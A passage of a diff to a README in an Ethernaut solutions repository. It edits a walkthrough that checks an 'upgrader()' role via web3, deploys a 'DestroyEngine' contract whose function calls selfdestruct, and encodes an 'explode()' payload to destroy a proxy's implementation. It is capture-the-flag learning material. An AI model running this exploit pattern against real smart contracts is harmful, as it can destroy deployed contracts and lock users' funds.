Bauchibred/ethernaut-solutions/README.md

     data: data
 })

-// Check that you are the upgrader
+// We can check to see if we are the upgrader
 // data = web3.eth.abi.encodeFunctionSignature("upgrader()")
 // await web3.eth.call({
 //     to: implAddr,
 //     data: data
 //     })

-// Create a bad contract and deploy it pragma solidity ^0.8.0;
+// Now we can hop on remix to create the Destro yEngine contract pragma solidity ^0.8.0;

-contract Kaboom {
+contract DestroyEngine {
     function explode() public {
         selfdestruct(payable(0));
     }
 }

-badContractAddr = "<insert bad contract address here>"
+DesEngAddr = "<we insert the destroy engine address here>"

 // create the payload to be called data = web3.eth.abi.encodeFunctionSignature("explode()")